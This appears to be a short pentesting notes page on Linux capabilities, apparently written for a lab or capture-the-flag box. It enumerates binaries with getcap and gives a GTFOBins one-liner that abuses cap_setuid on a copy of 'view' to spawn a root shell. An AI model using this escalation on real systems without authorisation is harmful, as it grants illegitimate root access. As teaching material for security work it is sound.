Capabilities

For the purpose of performing permission checks, traditional UNIX implementations distinguish two categories of processes: privileged processes (whose effective user ID is 0, referred to as superuser or root), and unprivileged processes (whose effective UID is nonzero). Privileged processes bypass all kernel permission checks, while unprivileged processes are subject to full permission checking based on the process's credentials (usually: effective UID, effective GID, and supplementary group list).

Starting with Linux 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled. Capabilities are a per-thread attribute.

From the Linux capabilities manual page: https://man7.org/linux/man-pages/man7/capabilities.7.html

Get capabilities of the current user

$ getcap -r / 2>/dev/null
...
/usr/bin/ping = cap_net_raw+ep
/home/jarrett/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep
...

Notice that both the binaries /home/jarrett/vim and /home/ubuntu/view has the cap_setuid+ep value set

With the commands found from GTFOBins (https://gtfobins.github.io/gtfobins/view/#capabilities), the /home/ubuntu/view binary can be used for privilege escalation:

# Assuming the system is using Python3
$ /home/ubuntu/view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

root# whoami
root

Notice that /home/ubuntu/view is used instead of simply view command

Last updated